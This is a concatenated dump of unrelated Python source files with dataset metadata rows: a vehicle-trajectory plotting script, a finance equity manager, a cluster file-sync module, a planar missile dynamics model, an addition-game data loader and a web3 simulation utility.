all_trajs_2 = np.concatenate((all_trajs_2, temp_data),axis=0)
print(all_trajs_1.shape)
print(all_trajs_2.shape)
print(sum(count0))
print(sum(count1))
# np.savetxt('./all_trajs_seg_1.txt', all_trajs_seg_1[1:,:], '%.4f')
# np.savetxt('./all_trajs_seg_2.txt', all_trajs_seg_2[1:,:], '%.4f')
np.savetxt('./all_trajs_seq_length_1.txt', np.array(count0), '%d')
np.savetxt('./all_trajs_seq_length_2.txt', np.array(count1), '%d')
#data_process()
#data_matrix = np.loadtxt('./data_matrix.txt')
#divide_data(data_matrix=data_matrix, segment_length=30)
###############################################
def check_data():
data = np.loadtxt('../simulation_data/data_matrix.txt')
temp_data = data[np.where(data[:,0]==69)]
T = temp_data.shape[0]
car1_long_vel = temp_data[:,3]
car2_long_vel = temp_data[:,7]
car1_acc = 10*(temp_data[1:,3]-temp_data[:-1,3])
car2_acc = 10*(temp_data[1:,7]-temp_data[:-1,7])
# plt.figure(1)
# plt.plot(range(T-1), car1_acc, c='b', label='main lane car acceleration')
# plt.plot(range(T-1), car2_acc, c='r', label='merging car acceleration')
# plt.legend()
plt.figure(2,figsize=(14,4))
plt.plot(range(T), car1_long_vel, c='b', label='main lane car velocity')
plt.plot(range(T), car2_long_vel, c='r', label='merging car velocity')
plt.legend()
plt.savefig('./long_vel_69.eps', bbox_inches='tight')
#plt.show()
#check_data()
###############################################
def plot_vehicles(case_id, data_matrix):
"""
This function is to plot vehicle trajectories with bounding boxes.
"""
current_case_data = data_matrix[np.where(data_matrix[:,0]==case_id)]
T = current_case_data.shape[0]
fig = plt.figure(figsize=(20,2))
for i in range(T):
if i<10:
name='00'+str(i)
elif i>=10 and i<100:
name = '0'+str(i)
elif i>=100:
name = str(i)
ax = fig.add_subplot(111, aspect='equal')
ax.add_patch(
patches.Rectangle(
(current_case_data[i,2]-2.0, current_case_data[i,4]-0.9), # (x,y)
4.0, # width
1.8, # height
alpha = 0.3 + 0.7*(T-i) / float(T),
facecolor='blue',
edgecolor='black',
linewidth=0.5
)
)
ax.add_patch(
patches.Rectangle(
(current_case_data[i,6]-2.0, current_case_data[i,8]-0.9), # (x,y)
4.0, # width
1.8, # height
alpha = 0.3 + 0.7*(T-i) / float(T),
facecolor='red',
edgecolor='black',
linewidth=0.5
)
)
ax.plot(range(-805,-360),-605*np.ones(445), color='k',linewidth=1)
ax.plot(range(-805,-584),-610*np.ones(221), color='k',linewidth=1)
ax.plot(range(-445,-360),-610*np.ones(85), color='k',linewidth=1)
x = [[-584,-805],[-445,-805]]
y = [[-610,-618],[-610,-622]]
for l in range(len(x)):
ax.plot(x[l], y[l], color='k',linewidth=1)
ax.set_xlim(-680, -400)
ax.set_ylim(-620, -600)
ax.set_xticks([])
ax.set_yticks([])
fig.savefig('./vehicles_plot/'+str(case_id)+'_'+str(name)+'.png', bbox_inches='tight')
data_matrix = np.loadtxt('./data_matrix.txt')
plot_vehicles(case_id=8, data_matrix=data_matrix)
| 29.136364
| 89
| 0.623375
| 1,246
| 7,692
| 3.614767
| 0.162921
| 0.130995
| 0.101909
| 0.091918
| 0.442496
| 0.318162
| 0.238455
| 0.181172
| 0.140764
| 0.099911
| 0
| 0.065277
| 0.189418
| 7,692
| 263
| 90
| 29.247148
| 0.657097
| 0.25637
| 0
| 0.121212
| 0
| 0
| 0.064361
| 0.017291
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045455
| false
| 0
| 0.030303
| 0
| 0.090909
| 0.037879
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86545fd84ae7762d72208edf0f23289ff9f754a1
| 4,660
|
py
|
Python
|
balancesheet/equityManager.py
|
tylertjburns/ledgerkeeper
|
cd69e9f48f35a973d08e450dfffdfea46bdc3802
|
[
"MIT"
] | null | null | null |
balancesheet/equityManager.py
|
tylertjburns/ledgerkeeper
|
cd69e9f48f35a973d08e450dfffdfea46bdc3802
|
[
"MIT"
] | null | null | null |
balancesheet/equityManager.py
|
tylertjburns/ledgerkeeper
|
cd69e9f48f35a973d08e450dfffdfea46bdc3802
|
[
"MIT"
] | null | null | null |
import balancesheet.mongoData.equities_data_service as dsvce
from userInteraction.financeCliInteraction import FinanceCliInteraction
import ledgerkeeper.mongoData.account_data_service as dsvca
from balancesheet.enums import EquityClass, AssetType, LiabiltyType, EquityTimeHorizon, EquityStatus, EquityContingency
import plotter as plot
class EquityManager():
def __init__(self, user_notification_system: FinanceCliInteraction):
self.uns = user_notification_system
def add_equity(self):
name = self.uns.request_string("Name: ")
description = self.uns.request_string("Description: ")
accountName = self.uns.request_from_dict(dsvca.accounts_as_dict())
equityClass = self.uns.request_enum(EquityClass)
if equityClass == EquityClass.ASSET:
equityType = self.uns.request_enum(AssetType)
elif equityClass == EquityClass.LIABILITY:
equityType = self.uns.request_enum(LiabiltyType)
else:
raise Exception(f"Unknown equity class: {equityClass.name}")
interestRate = self.uns.request_float("Interest Rate: ")
equityTimeHorizon = self.uns.request_enum(EquityTimeHorizon)
equityStatus = self.uns.request_enum(EquityStatus)
equityContingency = self.uns.request_enum(EquityContingency)
equity = dsvce.enter_if_not_exists(name=name,
description=description,
accountId=str(dsvca.account_by_name(accountName).id),
equityClass=equityClass,
equityType=equityType,
equityTimeHorizon=equityTimeHorizon,
equityStatus=equityStatus,
equityContingency=equityContingency,
interestRate=interestRate)
if equity is not None:
self.uns.notify_user("Equity entered successfully!")
def delete_equity(self):
accountName = self.uns.request_from_dict(dsvca.accounts_as_dict())
equityName = self.uns.request_from_dict(dsvce.equities_as_dict())
dsvce.delete_equity(dsvca.account_by_name(accountName).id, equityName)
def record_value(self):
accountName = self.uns.request_from_dict(dsvca.accounts_as_dict())
equityName = self.uns.request_from_dict(dsvce.equities_as_dict())
year = self.uns.request_int("Year: ")
month = self.uns.request_int("Month: ")
value = self.uns.request_float("Value: ")
account = dsvca.account_by_name(accountName)
equity = dsvce.equity_by_account_and_name(str(account.id), equityName)
if equity is None:
raise Exception(f"Equity: {accountName} [{account.id}], {equityName} not found.")
value = dsvce.record_value_on_equity(equity, year, month, value)
if value is not None:
self.uns.notify_user("Value Recorded successfully!")
def print_value_snapshots(self, accountName=None):
if accountName is None:
accountName = self.uns.request_from_dict(dsvca.accounts_as_dict())
account = dsvca.account_by_name(accountName)
equities = dsvce.equities_by_account(account.id)
if equities is None or len(equities) == 0:
self.uns.notify_user(f"No Equities in account [{accountName}]")
return
self.uns.pretty_print_items(sorted(equities, key=lambda x: x.equityType),
title="Equities Snapshots")
def print_equities(self):
self.uns.pretty_print_items(dsvce.query_equities("").to_json(), title="Equities")
def print_balance_sheet(self):
accountName = self.uns.request_from_dict(dsvca.accounts_as_dict())
relevant_mos = self.uns.request_int("Number of past months: ")
account = dsvca.account_by_name(accountName)
data = dsvce.balance_sheet_over_time(relevant_months=relevant_mos, accountIds=[str(account.id)])
self.uns.notify_user(f"\n---------Balance Sheet---------")
self.uns.pretty_print_items(data)
def plot_balance_over_time(self):
relevant_mos = self.uns.request_int("Number of past months: ")
accountName = self.uns.request_from_dict(dsvca.accounts_as_dict())
account = dsvca.account_by_name(accountName)
ax = plot.plot_assets_liabilities_worth_over_time(relevant_mos, accountIds=[str(account.id)])
if ax is None:
self.uns.notify_user("No Data to show...")
| 43.551402
| 119
| 0.65279
| 507
| 4,660
| 5.763314
| 0.224852
| 0.074264
| 0.105407
| 0.049281
| 0.350445
| 0.288159
| 0.219713
| 0.201917
| 0.201917
| 0.201917
| 0
| 0.000288
| 0.254721
| 4,660
| 106
| 120
| 43.962264
| 0.84106
| 0
| 0
| 0.181818
| 0
| 0
| 0.079931
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.103896
| false
| 0
| 0.064935
| 0
| 0.194805
| 0.077922
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8655870bbe029c575ef810e01964410eb82d6a13
| 10,603
|
py
|
Python
|
confluent_server/confluent/syncfiles.py
|
xcat2/confluent
|
47a83f4628df48638c2aebbfbcddc1531aac20d0
|
[
"Apache-2.0"
] | 27
|
2015-02-11T13:56:46.000Z
|
2021-12-28T14:17:20.000Z
|
confluent_server/confluent/syncfiles.py
|
jjohnson42/confluent
|
47a83f4628df48638c2aebbfbcddc1531aac20d0
|
[
"Apache-2.0"
] | 32
|
2015-09-23T13:19:04.000Z
|
2022-03-15T13:50:45.000Z
|
confluent_server/confluent/syncfiles.py
|
xcat2/confluent
|
47a83f4628df48638c2aebbfbcddc1531aac20d0
|
[
"Apache-2.0"
] | 24
|
2015-07-14T20:41:55.000Z
|
2021-07-15T04:18:51.000Z
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2021 Lenovo
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import glob
import os
import shutil
import tempfile
import confluent.sshutil as sshutil
import confluent.util as util
import confluent.noderange as noderange
import eventlet
import pwd
import grp
def mkdirp(path):
try:
os.makedirs(path)
except OSError as e:
if e.errno != 17:
raise
def get_entries(filename):
secname = 'REPLACE:'
filename = filename.strip()
if filename[-1] == '>':
filename = filename[:-1]
with open(filename, 'r') as slfile:
slist = slfile.read()
entries = slist.split('\n')
for ent in entries:
ent = ent.split('#', 1)[0].strip()
if not ent:
continue
if ent in ('APPENDONCE:', 'MERGE:', 'REPLACE:'):
secname = ent
if ent[0] == '<':
subfilename = ent[1:]
if subfilename[-1] == '>':
subfilename = subfilename[:-1]
if subfilename[0] != '/':
subfilename = os.path.join(os.path.dirname(filename), subfilename)
for subent in get_entries(subfilename):
yield subent
yield secname
else:
yield ent
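# A hypothetical synclist showing the grammar get_entries() parses: '#'
# starts a comment, 'MERGE:'/'APPENDONCE:'/'REPLACE:' switch sections, and
# 'src -> dst' renames a file. The paths below are made up for this sketch.
def _demo_get_entries():
    import tempfile
    sample = (
        "/etc/motd -> /etc/motd.node   # default section is REPLACE:\n"
        "MERGE:\n"
        "/etc/group\n"
        "APPENDONCE:\n"
        "/etc/hosts.extra -> /etc/hosts\n"
    )
    # delete=False so get_entries() can reopen the path after the handle closes
    with tempfile.NamedTemporaryFile('w', suffix='.synclist', delete=False) as slf:
        slf.write(sample)
    for entry in get_entries(slf.name):
        print(entry)  # section headers are yielded inline with the entries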
class SyncList(object):
def __init__(self, filename, nodename, cfg):
slist = None
self.replacemap = {}
self.appendmap = {}
self.appendoncemap = {}
self.mergemap = {}
self.optmap = {}
entries = get_entries(filename)
currmap = self.replacemap
for ent in entries:
try:
cmtidx = ent.index('#')
ent = ent[:cmtidx]
except ValueError:
pass
for special in '$%^&|{}':
if special in ent:
raise Exception(
'Special character "{}" reserved for future use'.format(special))
ent = ent.strip()
if not ent:
continue
if ent[-1] == ':':
if ent == 'MERGE:':
currmap = self.mergemap
elif ent == 'APPENDONCE:':
currmap = self.appendoncemap
elif ent == 'REPLACE:':
currmap = self.replacemap
else:
raise Exception(
'Section "{}" is not currently supported in syncfiles'.format(ent[:-1]))
continue
if '->' in ent:
k, v = ent.split('->')
k = k.strip()
v = v.strip()
if ':' in v:
nr, v = v.split(':', 1)
for candidate in noderange.NodeRange(nr, cfg).nodes:
if candidate == nodename:
break
else:
continue
optparts = v.split()
v = optparts[0]
optparts = optparts[1:]
else:
kparts = []
optparts = []
currparts = kparts
for part in ent.split():
if part[0] == '(':
currparts = optparts
currparts.append(part)
k = ' '.join(kparts)
v = None
entopts = {}
if optparts:
if optparts[0][0] != '(' or optparts[-1][-1] != ')':
raise Exception("Unsupported syntax in syncfile: " + ent)
opts = ','.join(optparts)
opts = opts[1:-1]
for opt in opts.split(','):
optname, optval = opt.split('=')
if optname == 'owner':
try:
uid = pwd.getpwnam(optval).pw_uid
except KeyError:
uid = None
optval = {'name': optval, 'id': uid}
elif optname == 'group':
try:
gid = grp.getgrnam(optval).gr_gid
except KeyError:
gid = None
optval = {'name': optval, 'id': gid}
entopts[optname] = optval
currmap[k] = v
targ = v if v else k
for f in targ.split():
self.optmap[f] = entopts
def sync_list_to_node(sl, node, suffixes):
targdir = tempfile.mkdtemp('.syncto{}'.format(node))
output = ''
try:
for ent in sl.replacemap:
stage_ent(sl.replacemap, ent, targdir)
if 'append' in suffixes:
while suffixes['append'] and suffixes['append'][0] == '/':
suffixes['append'] = suffixes['append'][1:]
for ent in sl.appendmap:
stage_ent(sl.appendmap, ent,
os.path.join(targdir, suffixes['append']))
if 'merge' in suffixes:
while suffixes['merge'] and suffixes['merge'][0] == '/':
suffixes['merge'] = suffixes['merge'][1:]
for ent in sl.mergemap:
stage_ent(sl.mergemap, ent,
os.path.join(targdir, suffixes['merge']), True)
if 'appendonce' in suffixes:
while suffixes['appendonce'] and suffixes['appendonce'][0] == '/':
suffixes['appendonce'] = suffixes['appendonce'][1:]
for ent in sl.appendoncemap:
stage_ent(sl.appendoncemap, ent,
os.path.join(targdir, suffixes['appendonce']), True)
sshutil.prep_ssh_key('/etc/confluent/ssh/automation')
output = util.run(
['rsync', '-rvLD', targdir + '/', 'root@{}:/'.format(node)])[0]
except Exception as e:
if 'CalledProcessError' not in repr(e):
# https://github.com/eventlet/eventlet/issues/413
# for some reason, can't catch the calledprocesserror normally
# for this exception, implement a hack workaround
raise
unreadablefiles = []
for root, dirnames, filenames in os.walk(targdir):
for filename in filenames:
filename = os.path.join(root, filename)
try:
with open(filename, 'r') as _:
pass
except OSError as e:
unreadablefiles.append(filename.replace(targdir, ''))
if unreadablefiles:
raise Exception("Syncing failed due to unreadable files: " + ','.join(unreadablefiles))
else:
raise
finally:
shutil.rmtree(targdir)
if not isinstance(output, str):
output = output.decode('utf8')
retval = {
'options': sl.optmap,
'output': output,
}
return retval # need dictionary with output and options
def stage_ent(currmap, ent, targdir, appendexist=False):
dst = currmap[ent]
everyfent = []
allfents = ent.split()
for tmpent in allfents:
fents = glob.glob(tmpent)
everyfent.extend(fents)
if not everyfent:
raise Exception('No matching files for "{}"'.format(ent))
if dst is None:  # a None destination means the source path doubles as the destination
dst = os.path.dirname(everyfent[0]) + '/'
while dst and dst[0] == '/':
dst = dst[1:]
if len(everyfent) > 1 and dst[-1] != '/':
raise Exception(
'Multiple files match {}, {} needs a trailing slash to indicate a directory'.format(ent, dst))
fulltarg = os.path.join(targdir, dst)
for targ in everyfent:
mkpathorlink(targ, fulltarg, appendexist)
def mkpathorlink(source, destination, appendexist=False):
if os.path.isdir(source):
mkdirp(destination)
for ent in os.listdir(source):
currsrc = os.path.join(source, ent)
currdst = os.path.join(destination, ent)
mkpathorlink(currsrc, currdst)
else:
if destination[-1] == '/':
mkdirp(destination)
destination = os.path.join(destination, os.path.basename(source))
else:
mkdirp(os.path.dirname(destination))
if appendexist and os.path.exists(destination):
tmpnam = tempfile.mktemp()
shutil.copy(destination, tmpnam)
os.remove(destination)
with open(destination, 'w') as realdest:
with open(tmpnam) as olddest:
realdest.write(olddest.read())
with open(source) as sourcedata:
realdest.write(sourcedata.read())
os.remove(tmpnam)
else:
os.symlink(source, destination)
syncrunners = {}
def start_syncfiles(nodename, cfg, suffixes):
deployinfo = cfg.get_node_attributes(
nodename, ('deployment.*',))
deployinfo = deployinfo.get(nodename, {})
profile = deployinfo.get(
'deployment.pendingprofile', {}).get('value', '')
if not profile:
profile = deployinfo.get(
'deployment.stagedprofile', {}).get('value', '')
if not profile:
profile = deployinfo.get(
'deployment.profile', {}).get('value', '')
if not profile:
raise Exception('Cannot perform syncfiles without profile assigned')
synclist = '/var/lib/confluent/public/os/{}/syncfiles'.format(profile)
if not os.path.exists(synclist):
return '200 OK' # not running
sl = SyncList(synclist, nodename, cfg)
if not (sl.appendmap or sl.mergemap or sl.replacemap or sl.appendoncemap):
return '200 OK' # the synclist has no actual entries
syncrunners[nodename] = eventlet.spawn(
sync_list_to_node, sl, nodename, suffixes)
return '202 Queued' # backgrounded
def get_syncresult(nodename):
if nodename not in syncrunners:
return ('204 Not Running', '')
if not syncrunners[nodename].dead:
return ('200 OK', '')
result = syncrunners[nodename].wait()
del syncrunners[nodename]
return ('200 OK', result)
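# A hypothetical polling helper built on the contract above: start_syncfiles()
# answers '202 Queued' once the greenthread is spawned, and get_syncresult()
# only returns the rsync output after that thread dies. This is not part of
# the original module; 'interval' is an assumed knob.
def wait_for_sync(nodename, cfg, suffixes, interval=1.0):
    status = start_syncfiles(nodename, cfg, suffixes)
    if status != '202 Queued':
        return status, ''  # nothing to sync for this node
    while nodename in syncrunners and not syncrunners[nodename].dead:
        eventlet.sleep(interval)
    return get_syncresult(nodename)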
| 37.334507
| 106
| 0.529661
| 1,097
| 10,603
| 5.094804
| 0.273473
| 0.017177
| 0.016103
| 0.007157
| 0.072106
| 0.042226
| 0.027196
| 0.017892
| 0.017892
| 0
| 0
| 0.010135
| 0.357918
| 10,603
| 283
| 107
| 37.466431
| 0.810811
| 0.084127
| 0
| 0.18254
| 0
| 0
| 0.086912
| 0.012283
| 0
| 0
| 0
| 0
| 0
| 1
| 0.031746
| false
| 0.007937
| 0.039683
| 0
| 0.103175
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86559f8329a6ab4177af7e36ab701bd44241c349
| 1,804
|
py
|
Python
|
fym/models/missile.py
|
JungYT/fym
|
d519c50086e3c7793b960e0326c92ed407836790
|
[
"MIT"
] | 14
|
2019-08-23T10:02:39.000Z
|
2021-12-24T13:04:43.000Z
|
fym/models/missile.py
|
JungYT/fym
|
d519c50086e3c7793b960e0326c92ed407836790
|
[
"MIT"
] | 110
|
2019-08-23T08:09:32.000Z
|
2021-06-29T06:54:48.000Z
|
fym/models/missile.py
|
JungYT/fym
|
d519c50086e3c7793b960e0326c92ed407836790
|
[
"MIT"
] | 10
|
2019-09-02T03:49:06.000Z
|
2021-05-10T04:35:40.000Z
|
import numpy as np
from fym.core import BaseSystem
class MissilePlanar(BaseSystem):
R = 288
g = 9.80665
S = 1
t1 = 1.5
t2 = 8.5
name = 'missile'
def __init__(self, initial_state):
super().__init__(initial_state)
def external(self, states, controls):
return 0
# return {"wind" : [(0, 0), (0, 0)]} # no external effects
def deriv(self, state, t, control, external):
# state and (control) input
x, y, V, gamma, = state.ravel()
a = control
# temperature
if y <= 11000:
Tmp = 288.16 - 0.0065*y
else:
Tmp = 216.66
# Mach number
M = V/(1.4*self.R*Tmp)**0.5
# Mass and thrust (Note: guidance loop is closed after t=t1)
if t < self.t1:
m = 135 - 14.53*t
T = 33000
elif t < self.t2:
m = 113.205 - 3.331*t
T = 7500
else:
m = 90.035
T = 0
# density and dynamic pressure
rho = (1.15579 - 1.058*1e-4*y + 3.725*1e-9*y**2
- 6.0*1e-14*y**3) # y in [0, 20000]
Q = 0.5*rho*V**2
# Drag model
if M < 0.93:
Cd0 = 0.02
elif M < 1.03:
Cd0 = 0.02 + 0.2*(M - 0.93)
elif M < 1.10:
Cd0 = 0.04 + 0.06*(M - 1.03)
else:
Cd0 = 0.0442 - 0.007*(M - 1.10)
if M < 1.15:
K = 0.2
else:
K = 0.2 + 0.246*(M - 1.15)
D0 = Cd0*Q*self.S
Di = K*m**2*a**2/(Q*self.S)
D = D0 + Di
dxdt = V*np.cos(gamma)
dydt = V*np.sin(gamma)
dVdt = (T - D)/m - self.g*np.sin(gamma)
dgammadt = (a - self.g*np.cos(gamma))/V
return np.vstack([dxdt, dydt, dVdt, dgammadt])
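# A quick sanity check of the dynamics above, as a sketch: it assumes fym's
# BaseSystem accepts the initial state array as its only positional argument
# (as the constructor above suggests), and the sample state values are made up.
if __name__ == '__main__':
    state0 = np.vstack([0.0, 100.0, 250.0, np.deg2rad(10.0)])  # x, y, V, gamma
    missile = MissilePlanar(state0)
    xdot = missile.deriv(state0, t=0.0, control=0.0, external=None)
    print(xdot.ravel())  # [dx/dt, dy/dt, dV/dt, dgamma/dt]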
| 25.408451
| 68
| 0.444568
| 279
| 1,804
| 2.83871
| 0.422939
| 0.015152
| 0.007576
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.167608
| 0.411308
| 1,804
| 70
| 69
| 25.771429
| 0.578154
| 0.121951
| 0
| 0.075472
| 0
| 0
| 0.004447
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.056604
| false
| 0
| 0.037736
| 0.018868
| 0.264151
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8655ba3bbd3cf852e91a43d33c2f2f32d558bc09
| 2,175
|
py
|
Python
|
egg/zoo/addition/data.py
|
chengemily/EGG
|
40e84228e9d6e9ae785c0e4a846bb7e12e2b9291
|
[
"MIT"
] | 1
|
2022-03-01T18:57:48.000Z
|
2022-03-01T18:57:48.000Z
|
egg/zoo/addition/data.py
|
chengemily/EGG
|
40e84228e9d6e9ae785c0e4a846bb7e12e2b9291
|
[
"MIT"
] | null | null | null |
egg/zoo/addition/data.py
|
chengemily/EGG
|
40e84228e9d6e9ae785c0e4a846bb7e12e2b9291
|
[
"MIT"
] | null | null | null |
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from typing import Iterable, Optional, Tuple
import torch
from torch.utils.data import DataLoader
class ScaledDataset:
def __init__(self, examples, scaling_factor=1):
self.examples = examples
self.scaling_factor = scaling_factor
def __len__(self):
return len(self.examples) * self.scaling_factor
def __getitem__(self, k):
k = k % len(self.examples)
return self.examples[k]
def get_dataloaders(opts) -> Tuple[Iterable[
Tuple[torch.Tensor, torch.Tensor, Optional[torch.Tensor]]
], Iterable[
Tuple[torch.Tensor, torch.Tensor, Optional[torch.Tensor]]
]]:
"Returning an iterator for tuple(sender_input, labels, receiver_input)."
full_data = enumerate_dataset(opts.input_size)
len_train = int(opts.training_density * len(full_data))
train_set, holdout_set = torch.utils.data.random_split(full_data,
[len_train, len(full_data) - len_train]
)
validation_set = train_set
train_set = ScaledDataset(train_set, opts.data_scaler)
train_loader, validation_loader, holdout_loader = DataLoader(train_set, batch_size=opts.batch_size, shuffle=True), \
DataLoader(validation_set, batch_size=len(validation_set)), \
DataLoader(holdout_set, batch_size=opts.batch_size)
return train_loader, validation_loader, holdout_loader
def enumerate_dataset(input_size):
data = []
labels = []
for i in range(input_size):
for j in range(input_size):
inp = torch.zeros(2 * input_size)
inp[i] = 1.0
inp[input_size + j] = 1.0
label = torch.zeros(2 * input_size - 1)
label[i + j] = 1.0
data.append(inp)
labels.append(label)
data_tuples = [(data[i], labels[i]) for i in range(len(data))]
return data_tuples
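# Worked example of the one-hot encoding produced by enumerate_dataset() for
# input_size=2: the pair (i=1, j=1) is one-hot within each operand half of
# the input, and the label one-hot encodes the sum i+j over the
# 2*input_size - 1 = 3 possible sums.
if __name__ == '__main__':
    pairs = enumerate_dataset(2)
    inp, label = pairs[3]        # the (i=1, j=1) pair
    print(inp.tolist())          # [0.0, 1.0, 0.0, 1.0]
    print(label.tolist())        # [0.0, 0.0, 1.0]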
| 32.462687
| 120
| 0.624368
| 269
| 2,175
| 4.821561
| 0.319703
| 0.048574
| 0.027756
| 0.038551
| 0.214341
| 0.1835
| 0.083269
| 0.083269
| 0.083269
| 0
| 0
| 0.006423
| 0.284138
| 2,175
| 66
| 121
| 32.954545
| 0.82659
| 0.110345
| 0
| 0.046512
| 0
| 0
| 0.035
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.116279
| false
| 0
| 0.069767
| 0.023256
| 0.302326
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8657acef2a48725b54eda761add6bd9a28ac1231
| 3,379
|
py
|
Python
|
simulation-web3py/utility.py
|
miker83z/cloud-chain
|
0f5c43159544da547173ee0425e78bede261513b
|
[
"MIT"
] | null | null | null |
simulation-web3py/utility.py
|
miker83z/cloud-chain
|
0f5c43159544da547173ee0425e78bede261513b
|
[
"MIT"
] | null | null | null |
simulation-web3py/utility.py
|
miker83z/cloud-chain
|
0f5c43159544da547173ee0425e78bede261513b
|
[
"MIT"
] | 1
|
2022-01-27T14:18:24.000Z
|
2022-01-27T14:18:24.000Z
|
import json
import os
from argparse import ArgumentTypeError
from eth_typing import Address
from web3.contract import Contract
from settings import MIN_VAL, MAX_VAL, DEPLOYED_CONTRACTS, CONFIG_DIR
async def init_simulation(contracts: [], factor: float, fn: str, status_init: bool) -> bool:
statuses = [True]
try:
if status_init:
for c in contracts:
# Use different cloud_addresses for each contract instance
cloud_address, cloud_status_ok = await c.cloud_sla_creation_activation()
c.set_cloud_sla_address(cloud_address)
statuses.append(cloud_status_ok)
if fn == 'read' or fn == 'read_deny_lost_file_check' or fn == 'file_check_undeleted_file':
statuses.append(await c.upload())
if fn == 'file_check_undeleted_file':
statuses.append(await c.read())
if fn == 'corrupted_file_check':
statuses.append(await c.another_file_upload_read())
if fn == 'delete':
for _ in range(round(factor / DEPLOYED_CONTRACTS) + 1):
statuses.append(await c.upload())
else:
for c in contracts:
if fn == 'delete':
if c.tx_upload_count < round(factor / DEPLOYED_CONTRACTS) + 1:
for _ in range(abs(c.tx_upload_count - (round(factor / DEPLOYED_CONTRACTS) + 1))):
statuses.append(await c.upload())
except ValueError as v:
print(f'{type(v)} [init_sim]: {v}')
return False  # match the declared bool return type instead of an implicit None
else:
return check_statuses(statuses)
def get_credentials(blockchain: str) -> tuple:
if blockchain == 'polygon':
from settings import (
polygon_private_keys
)
return polygon_private_keys
from settings import (
quorum_private_keys
)
return quorum_private_keys
def get_contract(w3, address: Address, compiled_contract_path: str) -> Contract:
def get_abi(path: str) -> list:
with open(path) as file:
contract_json = json.load(file)
contract_abi = contract_json['abi']
return contract_abi
abi = get_abi(compiled_contract_path)
contract = w3.eth.contract(address=address, abi=abi)
return contract
def check_statuses(statuses: []) -> bool:
for idx in range(len(statuses)):
if statuses[idx] == 0:
return False
return True
def exists_mkdir(paths: []):
for path in paths:
if not os.path.exists(path):
os.mkdir(path)
def get_contracts_config(blockchain: str, msg: bool = True):
if msg:
print('Retrieve config file...')
filename = f'{blockchain}.json'
filepath = os.path.join(os.getcwd(), CONFIG_DIR, filename)
with open(filepath) as file:
contracts_summary = json.loads(file.read())
if msg:
print(f'Config file retrieved at {filepath}.')
return contracts_summary
def range_limited_val(arg: str) -> int:
"""
Type function for argparse - int within some predefined bounds.
"""
try:
s = int(arg)
except ValueError:
raise ArgumentTypeError("must be a int number")
if s < MIN_VAL or s > MAX_VAL:
raise ArgumentTypeError(f"argument must be >= {MIN_VAL} and <= {MAX_VAL}")
return s
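# Hypothetical argparse wiring for the bounded-int type above; '--factor' is
# a made-up flag, and the sample value assumes 10 lies inside
# [MIN_VAL, MAX_VAL].
def _demo_range_limited_val():
    from argparse import ArgumentParser
    parser = ArgumentParser()
    parser.add_argument('--factor', type=range_limited_val,
                        help=f'int in [{MIN_VAL}, {MAX_VAL}]')
    return parser.parse_args(['--factor', '10'])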
| 32.805825
| 106
| 0.612607
| 415
| 3,379
| 4.795181
| 0.303614
| 0.01809
| 0.047739
| 0.050251
| 0.131156
| 0.128141
| 0.128141
| 0.128141
| 0.128141
| 0.055276
| 0
| 0.002929
| 0.29269
| 3,379
| 102
| 107
| 33.127451
| 0.829707
| 0.035809
| 0
| 0.189873
| 0
| 0
| 0.091302
| 0.023134
| 0
| 0
| 0
| 0
| 0
| 1
| 0.088608
| false
| 0
| 0.101266
| 0
| 0.303797
| 0.037975
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8657d90fe7092bbdb91cfe26101bae5ad4366000
| 808
|
py
|
Python
|
migrations/versions/816ea3631582_add_topics.py
|
OpenASL/HowSignBot
|
bd9c5bc0edfd6fb50bdce7c7c1d84462e1e704c2
|
[
"MIT"
] | 9
|
2021-01-12T07:28:30.000Z
|
2021-12-30T09:27:04.000Z
|
migrations/versions/816ea3631582_add_topics.py
|
OpenASL/HowSignBot
|
bd9c5bc0edfd6fb50bdce7c7c1d84462e1e704c2
|
[
"MIT"
] | 16
|
